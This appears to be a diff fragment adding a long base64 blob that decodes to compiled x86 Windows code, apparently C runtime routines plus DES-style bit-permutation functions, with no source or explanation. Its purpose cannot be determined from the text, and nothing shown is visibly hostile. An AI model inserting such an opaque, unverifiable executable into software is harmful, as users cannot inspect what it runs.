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 